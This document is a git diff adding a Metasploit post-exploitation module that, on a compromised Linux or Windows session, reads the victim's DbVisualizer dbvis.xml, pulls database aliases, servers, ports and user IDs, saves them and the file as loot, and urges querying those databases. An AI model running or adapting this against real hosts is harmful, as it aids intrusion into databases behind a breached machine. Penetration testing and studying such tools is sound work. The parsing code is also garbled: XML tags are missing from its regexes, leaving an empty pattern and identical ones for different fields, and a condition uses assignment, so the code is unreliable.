diff --git a/modules/post/multi/gather/dbvis_enum.rb b/modules/post/multi/gather/dbvis_enum.rb new file mode 100644 index 0000000000..40ab8dec2b --- /dev/null +++ b/modules/post/multi/gather/dbvis_enum.rb @@ -0,0 +1,162 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'msf/core/auxiliary/report' +require "resolv" + +class Metasploit3 < Msf::Post + + include Msf::Post::File + include Msf::Post::Unix + include Msf::Auxiliary::Report + + def initialize(info={}) + super( update_info( info, + 'Name' => 'Dbvis Connections settings', + 'Description' => %q{ + DbVisualizer stores the user database configuration in dbvis.xml. + This module retrieves the connections settings from this file. + | Author: David Bloom | + }, + 'License' => MSF_LICENSE, + 'Author' => [ 'David Bloom <@philophobia78>' ], + 'Platform' => %w{ linux win }, + 'SessionTypes' => [ 'meterpreter', 'shell'] + )) + end + + def run + + db_table = Rex::Ui::Text::Table.new( + 'Header' => "Dbvis available databases", + 'Indent' => 2, + 'Columns' => + [ + "Alias", + "Type", + "Server", + "Port", + "Database", + "Namespace", + "Userid", + ]) + + + dbs = [] + + case session.platform + when /linux/ + user = session.shell_command("whoami").chomp + print_status("Current user is #{user}") + if (user =~ /root/) + user_base="/root/" + else + user_base="/home/#{user}/" + end + dbvis_file = "#{user_base}.dbvis/config70/dbvis.xml" + when /win/ + if session.type =~ /meterpreter/ + user_profile = session.sys.config.getenv('USERPROFILE') + else + user_profile = cmd_exec("echo %USERPROFILE%").strip + end + dbvis_file = user_profile + "\\.dbvis\\config70\\dbvis.xml" + end + + db = {} + print_status("Reading: #{dbvis_file}") + dbfound=false + # read config file + read_file(dbvis_file).each_line do |line| + if (line =~ //) + dbfound=false + if db[:Database].nil? + db[:Database]=""; + end + if db[:Namespace].nil? + db[:Namespace]=""; + end + # save + dbs << db if (db[:Alias] and db[:Type] and db[:Server] and db[:Port] ) + db = {} + end + if (dbfound=true) + # get the alias + if (line =~ /([\S+\s+]+)<\/Alias>/i) + db[:Alias] = $1 + end + + # get the type + if (line =~ /([\S+\s+]+)<\/Type>/i) + db[:Type] = $1 + end + # get the user + if (line =~ /([\S+\s+]+)<\/Userid>/i) + db[:Userid] = $1 + end + + # get the server + if (line =~ /([\S+\s+]+)<\/UrlVariable>/i) + db[:Server] = $1 + end + + # get the port + if (line =~ /([\S+]+)<\/UrlVariable>/i) + db[:Port] = $1 + end + + # get the database + if (line =~ /([\S+\s+]+)<\/UrlVariable>/i) + db[:Database] = $1 + end + + # get the Namespace + if (line =~ /([\S+\s+]+)<\/UrlVariable>/i) + db[:Namespace] = $1 + end + end + end + end + + # print out + dbs.each do |db| + if (!!(db[:Server] =~ Resolv::IPv4::Regex)) + print_good("Reporting #{db[:Server]} ") + report_host(:host => db[:Server]); + end + db_table << [ db[:Alias] , db[:Type] , db[:Server], db[:Port], db[:Database], db[:Namespace], db[:Userid]] + end + + if db_table.rows.empty? + print_status("No database settings found") + else + print_line("\n" + db_table.to_s) + + print_good("Try to query listed databases with dbviscmd.sh (or .bat) -connection -sql and have fun !") + print_good("") + # store found databases + p = store_loot( + "dbvis.databases", + "text/csv", + session, + db_table.to_csv, + "dbvis_databases.txt", + "dbvis databases") + + print_good("Databases settings stored in: #{p.to_s}") + + end + print_status("Downloading #{dbvis_file}") + p = store_loot("dbvis.xml", "text/xml", session, read_file(dbvis_file), "#{dbvis_file}", "dbvis config") + print_good "dbvis.xml saved to #{p.to_s}" + + rescue ::Exception => e + print_error("Couldn't read #{dbvis_file}: #{e.to_s}") + end + +end